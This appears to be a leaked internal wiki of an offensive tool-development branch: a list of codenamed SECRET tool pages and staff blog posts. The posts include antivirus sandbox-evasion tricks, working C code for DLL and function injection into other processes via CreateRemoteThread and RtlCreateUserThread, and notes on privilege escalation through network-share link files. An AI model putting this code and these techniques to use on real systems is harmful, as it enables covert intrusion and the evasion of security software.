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Operational Support Branch (OSB)
Pages | Date | User |
Time Stomper empty
Munge Payload empty
Fight Club empty
Dancefloor - Linux empty
Jukebox - Mac empty
Bartender - Windows empty
New Developer Exercises SECRET
3. Visual Studio SECRET
10. Verbiage and Acronyms SECRET
11. Issues and Documentation SECRET
12. Bonus: Capture The Flag SECRET
2. Source Control SECRET
8. Bamboo And Dart SECRET
5. Win32 Programming Gotchas SECRET
6. Basic Forensics SECRET
7. The Art of Unit Tests SECRET
Shellterm 2.10 Test Server SECRET
Shellterm v3.0.1 Test Server SECRET
Flash Bang SECRET
Flash Bang v1.0 SECRET
Magical Mutt SECRET
Magical Mutt v1.0 SECRET
Melomy DriveIn SECRET
Melomy DriveIn v1.0 SECRET
RickyBobby SECRET
Fight Club SECRET
Fight Club v1.0 SECRET
Rain Maker SECRET
User Guide empty
Developer Guide empty
Basic Bit SECRET
Basic Bit v1.1 SECRET
Basic Bit v1.0 SECRET
ConnectifyMe Research SECRET
HammerDrill v2.0 SECRET
OSB Passwords SECRET
Time Stomper SECRET
Munge Payload SECRET
Error Munger SECRET
Blog posts:
[User #1179925]: Opportunistic Locks Used For Sandbox Defeat TOCTOU
Just finished writing up some info on something I hadn't heard about before starting this project. Opportunistic locks are pretty cool. Check it out here: Opportunistic Locks SECRET
[User #1179925]: Duqu 2.0 Kaspersky Write-Up
('viewpdf' missing)
[User #1179925]: An overly simple PSPPersonal Security Product (Anti-Virus) Sandbox defeat
So, in playing with the PSPPersonal Security Product (Anti-Virus) Evasion challenge in the Capture The Flag/New Developer Exercises, I had an idea. So a PSPPersonal Security Product (Anti-Virus) sandbox often emulates most of the function calls by the program in question in an attempt to evaluate deeper code paths (to determine that actual intent of the program). Most sandboxes are pretty advanced and most timing defeats have been mitigated in most PSPs. The idea I had was simply to test how detailed the actual sandbox was. In the challenge, I had made an executable that was being caught by the Windows Defender sandbox. To defeat the sandbox I first created a file and closed the handle. I then checked to see if the file still existed after I had created the file. The sandboxes themselves don't actually ever create a real file. To pass this defeat the PSPPersonal Security Product (Anti-Virus) would have to keep a virtual collection of files that I had created and respond appropriately. Although, Windows Defender is a simple example, techniques of this nature may be useful in many PSPs.
[User #1179925]: When Windows Lies, Continued... (Trust Issues++)
If you go to MSDNMicrosoft Developer Network and look at the OSVERSIONINFO structure, Microsoft has a nice little table to use to identify the version of the Windows Operating System. Underneath the table there is a note stating that Windows 8.1 will tell you that it is Windows 8. Ok, weird, but at least it's a documented lie (that's alright I guess?). Windows 10 however, is listed as Major = 10 Minor = 0. Awesome. Awesome until it isn't. Not on all builds of the Technical Preview. In fact, you will notice the Windows 10 VMs on DARTTest-Software (commercial) are not 10.0 but rather 6.4 (major.minor). So, keep that in mind if trying to blacklist parts of code when executing DARTTest-Software (commercial) scripts.
[User #71473]: A little bit more CreateRemoteThread
Crossing Session Boundaries
CreateRemoteThread on Windows Vista and Windows 7 (and by extension Windows 2008 Server and Windows 2008 Server R2) will not work across session boundaries. To work around this, use RtlCreateUserThread. Windows 8, 8.1 and 10 remove this restriction, but RltCreateUserThread also works on those platforms, so its fielder's choice as to whether you want lots of version checks or just use RtlCreateUserThread across the board. However, you definitely want to exclude XPWindows operating system (Version) – RtlCreateUserThread behaves badly on XPWindows operating system (Version) and will cause the target process to hang indefinitely with a full CPU core.
Here's a nice little wrapper that makes it easy to fire and forget
typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID; typedef long(WINAPIWindows Application Programming Interface *_RtlCreateUserThread)( HANDLE, PSECURITY_DESCRIPTOR, BOOLEAN, ULONG, PULONG, PULONG, PVOID, PVOID, PHANDLE, PCLIENT_ID); HANDLE MyCreateRemoteThread( __in HANDLE hProcess, __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, __in SIZE_T dwStackSize, __in LPTHREAD_START_ROUTINE lpStartAddress, __in_opt LPVOID lpParameter, __in DWORD dwCreationFlags, __out_opt LPDWORD lpThreadId ) { HANDLE hThread = NULL; // Don't use RtlCreateUserThread on XPWindows operating system (Version) it runs away with the CPU OSVERSIONINFO osvi; BOOL bIsWindowsXP; SecureZeroMemory(&osvi, sizeof(OSVERSIONINFO)); osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&osvi); bIsWindowsXP = (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion >= 1); if (bIsWindowsXP) { hThread = CreateRemoteThread(hProcess, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId); } else { _RtlCreateUserThread RtlCreateUserThread; CLIENT_ID cid = { 0 }; WCHAR wszNtDll[] = L"ntdll.dll"; CHAR szRtlCreateUserThread[] = "RtlCreateUserThread" HMODULE hModNtDll = GetModuleHandle(wszNtDll); RtlCreateUserThread = (_RtlCreateUserThread)GetProcAddress(hModNtDll, szRtlCreateUserThread); RtlCreateUserThread(hProcess, NULL, false, 0, 0, 0, lpStartAddress, lpParameter, &hThread, &cid); } return hThread; }Injecting Non-thread Functions
The one drawback to CreateRemoteThread is you can't use it to call just any old function in a remote process – the function you call must already exist in the other process and it must have a compatible signature to LPTHREAD_START_ROUTINE. Fortunately, you can use some compiler tricks to work around both of these limitations. To call APIApplication Programming Interface functions that don't match the Thread function signature, you can make a local function that wraps any call you'd like to make and then write that function into the remote process. The local function should take a structure containing the arguments for the APIApplication Programming Interface call.
You can also add completely new code to the remote process this way without having to inject a whole DLL. Wanna crash something? Just write a function into the remote process that divides by zero.
// WARNING: Crazy compiler voodoo ahead! // turn off incremental linking -- should force this to *not* use a jump table #pragma comment(linker, "/incremental:no") // turn off optimizations #pragma optimize( "", off ) // turn off pesky runtime checks that add an extra call to _RTC_CheckEsp to the end of our function #pragma runtime_checks( "", off) // put both functions in the same section. as long as there are only two, they should be in order #pragma code_seg( ".text$A" ) extern "C" { static DWORD WINAPIWindows Application Programming Interface DivideByZero(PVOID value) { // multiplying 0 * 0 turns the line below into a mere warning instead of a compiler error return (DWORD)value / (0 * 0); } static void __stdcall DivideByZero_end() { } }; #pragma code_seg() #pragma runtime_checks ("", restore) #pragma optimize( "",on ) SIZE_T funcSize = (SIZE_T)DivideByZero_end - (SIZE_T)DivideByZero;Then just use VirtualAllocEx and WriteProcessMemory to copy your function into the remote process, and use MyCreateRemoteThread to call it.
[User #4849738]: Updating ESXi Server from 5.5-6.0.0
- Ensure no one is currently utilizing the shellterm, pocket putin, etc.
- Alert IRCInternet Relay Chat users that the service is going down
- Suspend all VMs
- Put into maintenance mode
- Reboot
- Change BIOSBasic Input/Output System boot settings from UEFIUniversal Extendible Firmware Interface to BIOSBasic Input/Output System boot, and disable all boot devices aside from the USBUniversal Serial Bus CDCompact Disk drive
- Insert new ESXi BOOTABLE CDCompact Disk into drive, and boot
- Updater prompts for update or new install... UPDATE! (takes 10-15 minutes)
- After update, change boot settings back to UEFIUniversal Extendible Firmware Interface and boot.
- If applicable, download new vSphere Client
- Log into vSphere Client as root
- Configuration -> Authentication Services
> Re-add Active Directory - Permissions->Add Permissions->Add
- Type in search menu "osb", and select sg-osb
- Grant sg-osb the "OSB" assigned role
- Grant User #72251, User #?, and User #1179751 "Administrator" role
- Configuration -> Storage
- unmount oldmirror and REPO
- Re-add:
[root@osb:~] esxcli storage nfs list
Volume Name Host Share Accessible Mounted Read-Only isPE Hardware Acceleration
---------------------------- ------------------ -------------------- ---------- ------- --------- ----- ---------------------
REPO (All install ISOs here) /SANLUN2 false false true false Unknown
oldmirror /vol/vol1/oldmirrors false false true false Unknown
- Configuration -> Authentication Services
[User #1179925]: ClipArt
I was in the process of creating documentation and slides for a tool when I realized that the office clip art was lacking for what I needed in a diagram. Thus, I went to the webz and downloaded a few that may be useful to more than just my project. If you would like to seem them I threw them into \\FS-01\share\ClipArt. Enjoy!
[User #1179925]: A little bit of CreateRemoteThread
CHAR cDll[] = "C:\\Users\\User #?\\Desktop\\MyDll.dll"; int iPID = _wtoi(argv[1]); HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, iPID); if (hProc == NULL) printf("Could not get handle to process %d\n", iPID); LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"); if (!addr) printf("Failed to get load library function\n"); LPVOID arg = (LPVOID)VirtualAllocEx(hProc, NULL, strlen(cDll), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); if (!arg) printf("Failed to allocate memory\n"); int n = WriteProcessMemory(hProc, arg, cDll, strlen(cDll), NULL); if (!n) printf("Failed to write memory\n"); HANDLE threadID = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, NULL, NULL); if (threadID == NULL) printf("Error failed to create remote thread\n"); else printf("Success!!\n"); CloseHandle(hProc); return 0;
[User #1179925]: Network Share Operations With Privilege Escalation
Just a reminder, since we ran into this little issue late in the night (User #71473 and User #14588054). In a network share operation, we were using the link files to load a dll into explorer. The dll once loaded would restart itself with a SYSTEM instance of rundll32. At that point it appeared the rundll32 had initialized but wasn't doing anything. It took us probably too long to figure out that when the SYSTEM process tries to access the share, it doesn't have the appropriate credentials. The credentials of the user you are running as are used when authenticating file operations to the share.
[User #1179925]: Possible Tool Names
Some tool names I'm writing down from an online generator so I have them stored somewhere.
Reformed Renegade
Hilltop Savages
Gloating Gerbil
Cliff Maulers
Death Phobia
Latin Tornado??
Postal Toddler
Enraged Jackal
Free Apocalypse
Tundra Storm
Bacon Gambler
Cat Kittens
Night Farmer
Midnight Spawn
Gothic Gnome
Lazy Outlaw
Awful Aftermath
Karma Threat
Dancing Hyena
Goat Wrangler
Holy Roller